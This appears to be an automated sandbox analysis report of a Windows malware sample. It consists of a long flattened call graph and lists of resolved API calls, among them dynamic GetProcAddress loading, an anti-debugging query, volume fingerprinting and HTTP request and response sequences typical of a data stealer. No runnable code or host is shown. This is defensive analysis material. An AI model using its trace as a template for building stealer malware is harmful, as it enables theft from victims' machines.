13980 d345c0 2 API calls 13979->13980 13981 d334dd 13980->13981 13982 d345c0 2 API calls 13981->13982 13983 d334f6 13982->13983 13984 d345c0 2 API calls 13983->13984 13985 d3350f 13984->13985 13986 d345c0 2 API calls 13985->13986 13987 d33528 13986->13987 13988 d345c0 2 API calls 13987->13988 13989 d33541 13988->13989 13990 d345c0 2 API calls 13989->13990 13991 d3355a 13990->13991 13992 d345c0 2 API calls 13991->13992 13993 d33573 13992->13993 13994 d345c0 2 API calls 13993->13994 13995 d3358c 13994->13995 13996 d345c0 2 API calls 13995->13996 13997 d335a5 13996->13997 13998 d345c0 2 API calls 13997->13998 
13999 d335be 13998->13999 14000 d345c0 2 API calls 13999->14000 14001 d335d7 14000->14001 14002 d345c0 2 API calls 14001->14002 14003 d335f0 14002->14003 14004 d345c0 2 API calls 14003->14004 14005 d33609 14004->14005 14006 d345c0 2 API calls 14005->14006 14007 d33622 14006->14007 14008 d345c0 2 API calls 14007->14008 14009 d3363b 14008->14009 14010 d345c0 2 API calls 14009->14010 14011 d33654 14010->14011 14012 d345c0 2 API calls 14011->14012 14013 d3366d 14012->14013 14014 d345c0 2 API calls 14013->14014 14015 d33686 14014->14015 14016 d345c0 2 API calls 14015->14016 14017 d3369f 14016->14017 14018 d345c0 2 API calls 14017->14018 14019 d336b8 14018->14019 14020 d345c0 2 API calls 14019->14020 14021 d336d1 14020->14021 14022 d345c0 2 API calls 14021->14022 14023 d336ea 14022->14023 14024 d345c0 2 API calls 14023->14024 14025 d33703 14024->14025 14026 d345c0 2 API calls 14025->14026 14027 d3371c 14026->14027 14028 d345c0 2 API calls 14027->14028 14029 d33735 14028->14029 14030 d345c0 2 API calls 14029->14030 14031 d3374e 14030->14031 14032 d345c0 2 API calls 14031->14032 14033 d33767 14032->14033 14034 d345c0 2 API calls 14033->14034 14035 d33780 14034->14035 14036 d345c0 2 API calls 14035->14036 14037 d33799 14036->14037 14038 d345c0 2 API calls 14037->14038 14039 d337b2 14038->14039 14040 d345c0 2 API calls 14039->14040 14041 d337cb 14040->14041 14042 d345c0 2 API calls 14041->14042 14043 d337e4 14042->14043 14044 d345c0 2 API calls 14043->14044 14045 d337fd 14044->14045 14046 d345c0 2 API calls 14045->14046 14047 d33816 14046->14047 14048 d345c0 2 API calls 14047->14048 14049 d3382f 14048->14049 14050 d345c0 2 API calls 14049->14050 14051 d33848 14050->14051 14052 d345c0 2 API calls 14051->14052 14053 d33861 14052->14053 14054 d345c0 2 API calls 14053->14054 14055 d3387a 14054->14055 14056 d345c0 2 API calls 14055->14056 14057 d33893 14056->14057 14058 d345c0 2 API calls 14057->14058 14059 d338ac 14058->14059 14060 d345c0 2 API calls 14059->14060 14061 d338c5 
14060->14061 14062 d345c0 2 API calls 14061->14062 14063 d338de 14062->14063 14064 d345c0 2 API calls 14063->14064 14065 d338f7 14064->14065 14066 d345c0 2 API calls 14065->14066 14067 d33910 14066->14067 14068 d345c0 2 API calls 14067->14068 14069 d33929 14068->14069 14070 d345c0 2 API calls 14069->14070 14071 d33942 14070->14071 14072 d345c0 2 API calls 14071->14072 14073 d3395b 14072->14073 14074 d345c0 2 API calls 14073->14074 14075 d33974 14074->14075 14076 d345c0 2 API calls 14075->14076 14077 d3398d 14076->14077 14078 d345c0 2 API calls 14077->14078 14079 d339a6 14078->14079 14080 d345c0 2 API calls 14079->14080 14081 d339bf 14080->14081 14082 d345c0 2 API calls 14081->14082 14083 d339d8 14082->14083 14084 d345c0 2 API calls 14083->14084 14085 d339f1 14084->14085 14086 d345c0 2 API calls 14085->14086 14087 d33a0a 14086->14087 14088 d345c0 2 API calls 14087->14088 14089 d33a23 14088->14089 14090 d345c0 2 API calls 14089->14090 14091 d33a3c 14090->14091 14092 d345c0 2 API calls 14091->14092 14093 d33a55 14092->14093 14094 d345c0 2 API calls 14093->14094 14095 d33a6e 14094->14095 14096 d345c0 2 API calls 14095->14096 14097 d33a87 14096->14097 14098 d345c0 2 API calls 14097->14098 14099 d33aa0 14098->14099 14100 d345c0 2 API calls 14099->14100 14101 d33ab9 14100->14101 14102 d345c0 2 API calls 14101->14102 14103 d33ad2 14102->14103 14104 d345c0 2 API calls 14103->14104 14105 d33aeb 14104->14105 14106 d345c0 2 API calls 14105->14106 14107 d33b04 14106->14107 14108 d345c0 2 API calls 14107->14108 14109 d33b1d 14108->14109 14110 d345c0 2 API calls 14109->14110 14111 d33b36 14110->14111 14112 d345c0 2 API calls 14111->14112 14113 d33b4f 14112->14113 14114 d345c0 2 API calls 14113->14114 14115 d33b68 14114->14115 14116 d345c0 2 API calls 14115->14116 14117 d33b81 14116->14117 14118 d345c0 2 API calls 14117->14118 14119 d33b9a 14118->14119 14120 d345c0 2 API calls 14119->14120 14121 d33bb3 14120->14121 14122 d345c0 2 API calls 14121->14122 14123 d33bcc 14122->14123 
14124 d345c0 2 API calls 14123->14124 14125 d33be5 14124->14125 14126 d345c0 2 API calls 14125->14126 14127 d33bfe 14126->14127 14128 d345c0 2 API calls 14127->14128 14129 d33c17 14128->14129 14130 d345c0 2 API calls 14129->14130 14131 d33c30 14130->14131 14132 d345c0 2 API calls 14131->14132 14133 d33c49 14132->14133 14134 d345c0 2 API calls 14133->14134 14135 d33c62 14134->14135 14136 d345c0 2 API calls 14135->14136 14137 d33c7b 14136->14137 14138 d345c0 2 API calls 14137->14138 14139 d33c94 14138->14139 14140 d345c0 2 API calls 14139->14140 14141 d33cad 14140->14141 14142 d345c0 2 API calls 14141->14142 14143 d33cc6 14142->14143 14144 d345c0 2 API calls 14143->14144 14145 d33cdf 14144->14145 14146 d345c0 2 API calls 14145->14146 14147 d33cf8 14146->14147 14148 d345c0 2 API calls 14147->14148 14149 d33d11 14148->14149 14150 d345c0 2 API calls 14149->14150 14151 d33d2a 14150->14151 14152 d345c0 2 API calls 14151->14152 14153 d33d43 14152->14153 14154 d345c0 2 API calls 14153->14154 14155 d33d5c 14154->14155 14156 d345c0 2 API calls 14155->14156 14157 d33d75 14156->14157 14158 d345c0 2 API calls 14157->14158 14159 d33d8e 14158->14159 14160 d345c0 2 API calls 14159->14160 14161 d33da7 14160->14161 14162 d345c0 2 API calls 14161->14162 14163 d33dc0 14162->14163 14164 d345c0 2 API calls 14163->14164 14165 d33dd9 14164->14165 14166 d345c0 2 API calls 14165->14166 14167 d33df2 14166->14167 14168 d345c0 2 API calls 14167->14168 14169 d33e0b 14168->14169 14170 d345c0 2 API calls 14169->14170 14171 d33e24 14170->14171 14172 d345c0 2 API calls 14171->14172 14173 d33e3d 14172->14173 14174 d345c0 2 API calls 14173->14174 14175 d33e56 14174->14175 14176 d345c0 2 API calls 14175->14176 14177 d33e6f 14176->14177 14178 d345c0 2 API calls 14177->14178 14179 d33e88 14178->14179 14180 d345c0 2 API calls 14179->14180 14181 d33ea1 14180->14181 14182 d345c0 2 API calls 14181->14182 14183 d33eba 14182->14183 14184 d345c0 2 API calls 14183->14184 14185 d33ed3 14184->14185 14186 d345c0 2 
API calls 14185->14186 14187 d33eec 14186->14187 14188 d345c0 2 API calls 14187->14188 14189 d33f05 14188->14189 14190 d345c0 2 API calls 14189->14190 14191 d33f1e 14190->14191 14192 d345c0 2 API calls 14191->14192 14193 d33f37 14192->14193 14194 d345c0 2 API calls 14193->14194 14195 d33f50 14194->14195 14196 d345c0 2 API calls 14195->14196 14197 d33f69 14196->14197 14198 d345c0 2 API calls 14197->14198 14199 d33f82 14198->14199 14200 d345c0 2 API calls 14199->14200 14201 d33f9b 14200->14201 14202 d345c0 2 API calls 14201->14202 14203 d33fb4 14202->14203 14204 d345c0 2 API calls 14203->14204 14205 d33fcd 14204->14205 14206 d345c0 2 API calls 14205->14206 14207 d33fe6 14206->14207 14208 d345c0 2 API calls 14207->14208 14209 d33fff 14208->14209 14210 d345c0 2 API calls 14209->14210 14211 d34018 14210->14211 14212 d345c0 2 API calls 14211->14212 14213 d34031 14212->14213 14214 d345c0 2 API calls 14213->14214 14215 d3404a 14214->14215 14216 d345c0 2 API calls 14215->14216 14217 d34063 14216->14217 14218 d345c0 2 API calls 14217->14218 14219 d3407c 14218->14219 14220 d345c0 2 API calls 14219->14220 14221 d34095 14220->14221 14222 d345c0 2 API calls 14221->14222 14223 d340ae 14222->14223 14224 d345c0 2 API calls 14223->14224 14225 d340c7 14224->14225 14226 d345c0 2 API calls 14225->14226 14227 d340e0 14226->14227 14228 d345c0 2 API calls 14227->14228 14229 d340f9 14228->14229 14230 d345c0 2 API calls 14229->14230 14231 d34112 14230->14231 14232 d345c0 2 API calls 14231->14232 14233 d3412b 14232->14233 14234 d345c0 2 API calls 14233->14234 14235 d34144 14234->14235 14236 d345c0 2 API calls 14235->14236 14237 d3415d 14236->14237 14238 d345c0 2 API calls 14237->14238 14239 d34176 14238->14239 14240 d345c0 2 API calls 14239->14240 14241 d3418f 14240->14241 14242 d345c0 2 API calls 14241->14242 14243 d341a8 14242->14243 14244 d345c0 2 API calls 14243->14244 14245 d341c1 14244->14245 14246 d345c0 2 API calls 14245->14246 14247 d341da 14246->14247 14248 d345c0 2 API calls 
14247->14248 14249 d341f3 14248->14249 14250 d345c0 2 API calls 14249->14250 14251 d3420c 14250->14251 14252 d345c0 2 API calls 14251->14252 14253 d34225 14252->14253 14254 d345c0 2 API calls 14253->14254 14255 d3423e 14254->14255 14256 d345c0 2 API calls 14255->14256 14257 d34257 14256->14257 14258 d345c0 2 API calls 14257->14258 14259 d34270 14258->14259 14260 d345c0 2 API calls 14259->14260 14261 d34289 14260->14261 14262 d345c0 2 API calls 14261->14262 14263 d342a2 14262->14263 14264 d345c0 2 API calls 14263->14264 14265 d342bb 14264->14265 14266 d345c0 2 API calls 14265->14266 14267 d342d4 14266->14267 14268 d345c0 2 API calls 14267->14268 14269 d342ed 14268->14269 14270 d345c0 2 API calls 14269->14270 14271 d34306 14270->14271 14272 d345c0 2 API calls 14271->14272 14273 d3431f 14272->14273 14274 d345c0 2 API calls 14273->14274 14275 d34338 14274->14275 14276 d345c0 2 API calls 14275->14276 14277 d34351 14276->14277 14278 d345c0 2 API calls 14277->14278 14279 d3436a 14278->14279 14280 d345c0 2 API calls 14279->14280 14281 d34383 14280->14281 14282 d345c0 2 API calls 14281->14282 14283 d3439c 14282->14283 14284 d345c0 2 API calls 14283->14284 14285 d343b5 14284->14285 14286 d345c0 2 API calls 14285->14286 14287 d343ce 14286->14287 14288 d345c0 2 API calls 14287->14288 14289 d343e7 14288->14289 14290 d345c0 2 API calls 14289->14290 14291 d34400 14290->14291 14292 d345c0 2 API calls 14291->14292 14293 d34419 14292->14293 14294 d345c0 2 API calls 14293->14294 14295 d34432 14294->14295 14296 d345c0 2 API calls 14295->14296 14297 d3444b 14296->14297 14298 d345c0 2 API calls 14297->14298 14299 d34464 14298->14299 14300 d345c0 2 API calls 14299->14300 14301 d3447d 14300->14301 14302 d345c0 2 API calls 14301->14302 14303 d34496 14302->14303 14304 d345c0 2 API calls 14303->14304 14305 d344af 14304->14305 14306 d345c0 2 API calls 14305->14306 14307 d344c8 14306->14307 14308 d345c0 2 API calls 14307->14308 14309 d344e1 14308->14309 14310 d345c0 2 API calls 14309->14310 
14311 d344fa 14310->14311 14312 d345c0 2 API calls 14311->14312 14313 d34513 14312->14313 14314 d345c0 2 API calls 14313->14314 14315 d3452c 14314->14315 14316 d345c0 2 API calls 14315->14316 14317 d34545 14316->14317 14318 d345c0 2 API calls 14317->14318 14319 d3455e 14318->14319 14320 d345c0 2 API calls 14319->14320 14321 d34577 14320->14321 14322 d345c0 2 API calls 14321->14322 14323 d34590 14322->14323 14324 d345c0 2 API calls 14323->14324 14325 d345a9 14324->14325 14326 d49c10 14325->14326 14327 d4a036 8 API calls 14326->14327 14328 d49c20 43 API calls 14326->14328 14329 d4a146 14327->14329 14330 d4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14327->14330 14328->14327 14331 d4a216 14329->14331 14332 d4a153 8 API calls 14329->14332 14330->14329 14333 d4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14331->14333 14334 d4a298 14331->14334 14332->14331 14333->14334 14335 d4a2a5 6 API calls 14334->14335 14336 d4a337 14334->14336 14335->14336 14337 d4a344 9 API calls 14336->14337 14338 d4a41f 14336->14338 14337->14338 14339 d4a4a2 14338->14339 14340 d4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14338->14340 14341 d4a4dc 14339->14341 14342 d4a4ab GetProcAddress GetProcAddress 14339->14342 14340->14339 14343 d4a515 14341->14343 14344 d4a4e5 GetProcAddress GetProcAddress 14341->14344 14342->14341 14345 d4a612 14343->14345 14346 d4a522 10 API calls 14343->14346 14344->14343 14347 d4a67d 14345->14347 14348 d4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14345->14348 14346->14345 14349 d4a686 GetProcAddress 14347->14349 14350 d4a69e 14347->14350 14348->14347 14349->14350 14351 d4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14350->14351 14352 d45ca3 14350->14352 14351->14352 14353 d31590 14352->14353 15474 d31670 14353->15474 14356 d4a7a0 lstrcpy 14357 d315b5 14356->14357 14358 d4a7a0 lstrcpy 14357->14358 14359 d315c7 14358->14359 
14360 d4a7a0 lstrcpy 14359->14360 14361 d315d9 14360->14361 14362 d4a7a0 lstrcpy 14361->14362 14363 d31663 14362->14363 14364 d45510 14363->14364 14365 d45521 14364->14365 14366 d4a820 2 API calls 14365->14366 14367 d4552e 14366->14367 14368 d4a820 2 API calls 14367->14368 14369 d4553b 14368->14369 14370 d4a820 2 API calls 14369->14370 14371 d45548 14370->14371 14372 d4a740 lstrcpy 14371->14372 14373 d45555 14372->14373 14374 d4a740 lstrcpy 14373->14374 14375 d45562 14374->14375 14376 d4a740 lstrcpy 14375->14376 14377 d4556f 14376->14377 14378 d4a740 lstrcpy 14377->14378 14412 d4557c 14378->14412 14379 d4a820 lstrlen lstrcpy 14379->14412 14380 d4a740 lstrcpy 14380->14412 14381 d4a8a0 lstrcpy 14381->14412 14382 d45643 StrCmpCA 14382->14412 14383 d456a0 StrCmpCA 14384 d457dc 14383->14384 14383->14412 14385 d4a8a0 lstrcpy 14384->14385 14386 d457e8 14385->14386 14387 d4a820 2 API calls 14386->14387 14389 d457f6 14387->14389 14388 d451f0 20 API calls 14388->14412 14392 d4a820 2 API calls 14389->14392 14390 d45856 StrCmpCA 14391 d45991 14390->14391 14390->14412 14393 d4a8a0 lstrcpy 14391->14393 14394 d45805 14392->14394 14395 d4599d 14393->14395 14396 d31670 lstrcpy 14394->14396 14397 d4a820 2 API calls 14395->14397 14405 d45811 14396->14405 14400 d459ab 14397->14400 14398 d45a0b StrCmpCA 14401 d45a16 Sleep 14398->14401 14402 d45a28 14398->14402 14399 d452c0 25 API calls 14399->14412 14403 d4a820 2 API calls 14400->14403 14401->14412 14404 d4a8a0 lstrcpy 14402->14404 14406 d459ba 14403->14406 14408 d45a34 14404->14408 14405->13471 14407 d31670 lstrcpy 14406->14407 14407->14405 14409 d4a820 2 API calls 14408->14409 14410 d45a43 14409->14410 14411 d4a820 2 API calls 14410->14411 14413 d45a52 14411->14413 14412->14379 14412->14380 14412->14381 14412->14382 14412->14383 14412->14388 14412->14390 14412->14398 14412->14399 14414 d4578a StrCmpCA 14412->14414 14416 d4a7a0 lstrcpy 14412->14416 14417 d4593f StrCmpCA 14412->14417 14418 d31590 lstrcpy 14412->14418 14415 d31670 
lstrcpy 14413->14415 14414->14412 14415->14405 14416->14412 14417->14412 14418->14412 14420 d47553 GetVolumeInformationA 14419->14420 14421 d4754c 14419->14421 14422 d47591 14420->14422 14421->14420 14423 d475fc GetProcessHeap RtlAllocateHeap 14422->14423 14424 d47628 wsprintfA 14423->14424 14425 d47619 14423->14425 14427 d4a740 lstrcpy 14424->14427 14426 d4a740 lstrcpy 14425->14426 14428 d45da7 14426->14428 14427->14428 14428->13492 14430 d4a7a0 lstrcpy 14429->14430 14431 d34899 14430->14431 15483 d347b0 14431->15483 14433 d348a5 14434 d4a740 lstrcpy 14433->14434 14435 d348d7 14434->14435 14436 d4a740 lstrcpy 14435->14436 14437 d348e4 14436->14437 14438 d4a740 lstrcpy 14437->14438 14439 d348f1 14438->14439 14440 d4a740 lstrcpy 14439->14440 14441 d348fe 14440->14441 14442 d4a740 lstrcpy 14441->14442 14443 d3490b InternetOpenA StrCmpCA 14442->14443 14444 d34944 14443->14444 14445 d34ecb InternetCloseHandle 14444->14445 15489 d48b60 14444->15489 14446 d34ee8 14445->14446 15504 d39ac0 CryptStringToBinaryA 14446->15504 14448 d34963 15497 d4a920 14448->15497 14451 d34976 14453 d4a8a0 lstrcpy 14451->14453 14458 d3497f 14453->14458 14454 d4a820 2 API calls 14455 d34f05 14454->14455 14457 d4a9b0 4 API calls 14455->14457 14456 d34f27 ctype 14460 d4a7a0 lstrcpy 14456->14460 14459 d34f1b 14457->14459 14462 d4a9b0 4 API calls 14458->14462 14461 d4a8a0 lstrcpy 14459->14461 14465 d34f57 14460->14465 14461->14456 14463 d349a9 14462->14463 14464 d4a8a0 lstrcpy 14463->14464 14466 d349b2 14464->14466 14465->13495 14467 d4a9b0 4 API calls 14466->14467 14468 d349d1 14467->14468 14469 d4a8a0 lstrcpy 14468->14469 14470 d349da 14469->14470 14471 d4a920 3 API calls 14470->14471 14472 d349f8 14471->14472 14473 d4a8a0 lstrcpy 14472->14473 14474 d34a01 14473->14474 14475 d4a9b0 4 API calls 14474->14475 14476 d34a20 14475->14476 14477 d4a8a0 lstrcpy 14476->14477 14478 d34a29 14477->14478 14479 d4a9b0 4 API calls 14478->14479 14480 d34a48 14479->14480 14481 d4a8a0 lstrcpy 14480->14481 14482 
d34a51 14481->14482 14483 d4a9b0 4 API calls 14482->14483 14484 d34a7d 14483->14484 14485 d4a920 3 API calls 14484->14485 14486 d34a84 14485->14486 14487 d4a8a0 lstrcpy 14486->14487 14488 d34a8d 14487->14488 14489 d34aa3 InternetConnectA 14488->14489 14489->14445 14490 d34ad3 HttpOpenRequestA 14489->14490 14492 d34b28 14490->14492 14493 d34ebe InternetCloseHandle 14490->14493 14494 d4a9b0 4 API calls 14492->14494 14493->14445 14495 d34b3c 14494->14495 14496 d4a8a0 lstrcpy 14495->14496 14497 d34b45 14496->14497 14498 d4a920 3 API calls 14497->14498 14499 d34b63 14498->14499 14500 d4a8a0 lstrcpy 14499->14500 14501 d34b6c 14500->14501 14502 d4a9b0 4 API calls 14501->14502 14503 d34b8b 14502->14503 14504 d4a8a0 lstrcpy 14503->14504 14505 d34b94 14504->14505 14506 d4a9b0 4 API calls 14505->14506 14507 d34bb5 14506->14507 14508 d4a8a0 lstrcpy 14507->14508 14509 d34bbe 14508->14509 14510 d4a9b0 4 API calls 14509->14510 14511 d34bde 14510->14511 14512 d4a8a0 lstrcpy 14511->14512 14513 d34be7 14512->14513 14514 d4a9b0 4 API calls 14513->14514 14515 d34c06 14514->14515 14516 d4a8a0 lstrcpy 14515->14516 14517 d34c0f 14516->14517 14518 d4a920 3 API calls 14517->14518 14519 d34c2d 14518->14519 14520 d4a8a0 lstrcpy 14519->14520 14521 d34c36 14520->14521 14522 d4a9b0 4 API calls 14521->14522 14523 d34c55 14522->14523 14524 d4a8a0 lstrcpy 14523->14524 14525 d34c5e 14524->14525 14526 d4a9b0 4 API calls 14525->14526 14527 d34c7d 14526->14527 14528 d4a8a0 lstrcpy 14527->14528 14529 d34c86 14528->14529 14530 d4a920 3 API calls 14529->14530 14531 d34ca4 14530->14531 14532 d4a8a0 lstrcpy 14531->14532 14533 d34cad 14532->14533 14534 d4a9b0 4 API calls 14533->14534 14535 d34ccc 14534->14535 14536 d4a8a0 lstrcpy 14535->14536 14537 d34cd5 14536->14537 14538 d4a9b0 4 API calls 14537->14538 14539 d34cf6 14538->14539 14540 d4a8a0 lstrcpy 14539->14540 14541 d34cff 14540->14541 14542 d4a9b0 4 API calls 14541->14542 14543 d34d1f 14542->14543 14544 d4a8a0 lstrcpy 14543->14544 14545 d34d28 
14544->14545 14546 d4a9b0 4 API calls 14545->14546 14547 d34d47 14546->14547 14548 d4a8a0 lstrcpy 14547->14548 14549 d34d50 14548->14549 14550 d4a920 3 API calls 14549->14550 14551 d34d6e 14550->14551 14552 d4a8a0 lstrcpy 14551->14552 14553 d34d77 14552->14553 14554 d4a740 lstrcpy 14553->14554 14555 d34d92 14554->14555 14556 d4a920 3 API calls 14555->14556 14557 d34db3 14556->14557 14558 d4a920 3 API calls 14557->14558 14559 d34dba 14558->14559 14560 d4a8a0 lstrcpy 14559->14560 14561 d34dc6 14560->14561 14562 d34de7 lstrlen 14561->14562 14563 d34dfa 14562->14563 14564 d34e03 lstrlen 14563->14564 15503 d4aad0 14564->15503 14566 d34e13 HttpSendRequestA 14567 d34e32 InternetReadFile 14566->14567 14568 d34e67 InternetCloseHandle 14567->14568 14573 d34e5e 14567->14573 14571 d4a800 14568->14571 14570 d4a9b0 4 API calls 14570->14573 14571->14493 14572 d4a8a0 lstrcpy 14572->14573 14573->14567 14573->14568 14573->14570 14573->14572 15510 d4aad0 14574->15510 14576 d417c4 StrCmpCA 14577 d417d7 14576->14577 14578 d417cf ExitProcess 14576->14578 14579 d419c2 14577->14579 14580 d41970 StrCmpCA 14577->14580 14581 d418f1 StrCmpCA 14577->14581 14582 d41951 StrCmpCA 14577->14582 14583 d41932 StrCmpCA 14577->14583 14584 d41913 StrCmpCA 14577->14584 14585 d4185d StrCmpCA 14577->14585 14586 d4187f StrCmpCA 14577->14586 14587 d418ad StrCmpCA 14577->14587 14588 d418cf StrCmpCA 14577->14588 14589 d4a820 lstrlen lstrcpy 14577->14589 14579->13497 14580->14577 14581->14577 14582->14577 14583->14577 14584->14577 14585->14577 14586->14577 14587->14577 14588->14577 14589->14577 14591 d4a7a0 lstrcpy 14590->14591 14592 d35979 14591->14592 14593 d347b0 2 API calls 14592->14593 14594 d35985 14593->14594 14595 d4a740 lstrcpy 14594->14595 14596 d359ba 14595->14596 14597 d4a740 lstrcpy 14596->14597 14598 d359c7 14597->14598 14599 d4a740 lstrcpy 14598->14599 14600 d359d4 14599->14600 14601 d4a740 lstrcpy 14600->14601 14602 d359e1 14601->14602 14603 d4a740 lstrcpy 14602->14603 14604 d359ee InternetOpenA 
StrCmpCA 14603->14604 14605 d35a1d 14604->14605 14606 d35fc3 InternetCloseHandle 14605->14606 14608 d48b60 3 API calls 14605->14608 14607 d35fe0 14606->14607 14610 d39ac0 4 API calls 14607->14610 14609 d35a3c 14608->14609 14611 d4a920 3 API calls 14609->14611 14613 d35fe6 14610->14613 14612 d35a4f 14611->14612 14614 d4a8a0 lstrcpy 14612->14614 14615 d4a820 2 API calls 14613->14615 14617 d3601f ctype 14613->14617 14619 d35a58 14614->14619 14616 d35ffd 14615->14616 14618 d4a9b0 4 API calls 14616->14618 14621 d4a7a0 lstrcpy 14617->14621 14620 d36013 14618->14620 14623 d4a9b0 4 API calls 14619->14623 14622 d4a8a0 lstrcpy 14620->14622 14632 d3604f 14621->14632 14622->14617 14624 d35a82 14623->14624 14625 d4a8a0 lstrcpy 14624->14625 14626 d35a8b 14625->14626 14627 d4a9b0 4 API calls 14626->14627 14628 d35aaa 14627->14628 14629 d4a8a0 lstrcpy 14628->14629 14630 d35ab3 14629->14630 14631 d4a920 3 API calls 14630->14631 14633 d35ad1 14631->14633 14632->13503 14634 d4a8a0 lstrcpy 14633->14634 14635 d35ada 14634->14635 14636 d4a9b0 4 API calls 14635->14636 14637 d35af9 14636->14637 14638 d4a8a0 lstrcpy 14637->14638 14639 d35b02 14638->14639 14640 d4a9b0 4 API calls 14639->14640 14641 d35b21 14640->14641 14642 d4a8a0 lstrcpy 14641->14642 14643 d35b2a 14642->14643 14644 d4a9b0 4 API calls 14643->14644 14645 d35b56 14644->14645 14646 d4a920 3 API calls 14645->14646 14647 d35b5d 14646->14647 14648 d4a8a0 lstrcpy 14647->14648 14649 d35b66 14648->14649 14650 d35b7c InternetConnectA 14649->14650 14650->14606 14651 d35bac HttpOpenRequestA 14650->14651 14653 d35fb6 InternetCloseHandle 14651->14653 14654 d35c0b 14651->14654 14653->14606 14655 d4a9b0 4 API calls 14654->14655 14656 d35c1f 14655->14656 14657 d4a8a0 lstrcpy 14656->14657 14658 d35c28 14657->14658 14659 d4a920 3 API calls 14658->14659 14660 d35c46 14659->14660 14661 d4a8a0 lstrcpy 14660->14661 14662 d35c4f 14661->14662 14663 d4a9b0 4 API calls 14662->14663 14664 d35c6e 14663->14664 14665 d4a8a0 lstrcpy 14664->14665 14666 

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              • GetProcAddress.KERNEL32(75900000,008D0570), ref: 00D498A1
                              • GetProcAddress.KERNEL32(75900000,008D0798), ref: 00D498BA
                              • GetProcAddress.KERNEL32(75900000,008D0600), ref: 00D498D2
                              • GetProcAddress.KERNEL32(75900000,008D0810), ref: 00D498EA
                              • GetProcAddress.KERNEL32(75900000,008D07B0), ref: 00D49903
                              • GetProcAddress.KERNEL32(75900000,008D8880), ref: 00D4991B
                              • GetProcAddress.KERNEL32(75900000,008C6820), ref: 00D49933
                              • GetProcAddress.KERNEL32(75900000,008C6840), ref: 00D4994C
                              • GetProcAddress.KERNEL32(75900000,008D07F8), ref: 00D49964
                              • GetProcAddress.KERNEL32(75900000,008D0828), ref: 00D4997C
                              • GetProcAddress.KERNEL32(75900000,008D05B8), ref: 00D49995
                              • GetProcAddress.KERNEL32(75900000,008D05D0), ref: 00D499AD
                              • GetProcAddress.KERNEL32(75900000,008C69A0), ref: 00D499C5
                              • GetProcAddress.KERNEL32(75900000,008D05E8), ref: 00D499DE
                              • GetProcAddress.KERNEL32(75900000,008D0630), ref: 00D499F6
                              • GetProcAddress.KERNEL32(75900000,008C66C0), ref: 00D49A0E
                              • GetProcAddress.KERNEL32(75900000,008D0648), ref: 00D49A27
                              • GetProcAddress.KERNEL32(75900000,008D08A0), ref: 00D49A3F
                              • GetProcAddress.KERNEL32(75900000,008C69E0), ref: 00D49A57
                              • GetProcAddress.KERNEL32(75900000,008D08B8), ref: 00D49A70
                              • GetProcAddress.KERNEL32(75900000,008C6860), ref: 00D49A88
                              • LoadLibraryA.KERNEL32(008D08E8,?,00D46A00), ref: 00D49A9A
                              • LoadLibraryA.KERNEL32(008D0900,?,00D46A00), ref: 00D49AAB
                              • LoadLibraryA.KERNEL32(008D0858,?,00D46A00), ref: 00D49ABD
                              • LoadLibraryA.KERNEL32(008D0870,?,00D46A00), ref: 00D49ACF
                              • LoadLibraryA.KERNEL32(008D0918,?,00D46A00), ref: 00D49AE0
                              • GetProcAddress.KERNEL32(75070000,008D0888), ref: 00D49B02
                              • GetProcAddress.KERNEL32(75FD0000,008D08D0), ref: 00D49B23
                              • GetProcAddress.KERNEL32(75FD0000,008D8FA0), ref: 00D49B3B
                              • GetProcAddress.KERNEL32(75A50000,008D8EF8), ref: 00D49B5D
                              • GetProcAddress.KERNEL32(74E50000,008C6740), ref: 00D49B7E
                              • GetProcAddress.KERNEL32(76E80000,008D89A0), ref: 00D49B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00D49BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00D49BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                              • Instruction ID: e5cc3c57073bc171a6ccc2a1b5f938952a685cd7eae74e5342efb8dc1d25a0eb
                              • Opcode Fuzzy Hash: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                              • Instruction Fuzzy Hash: 5EA13BB55042489FD348EFA8ED89D6E3BF9F7CC301706451AA61DC3264D63998C2EB63

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D3460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D3479C
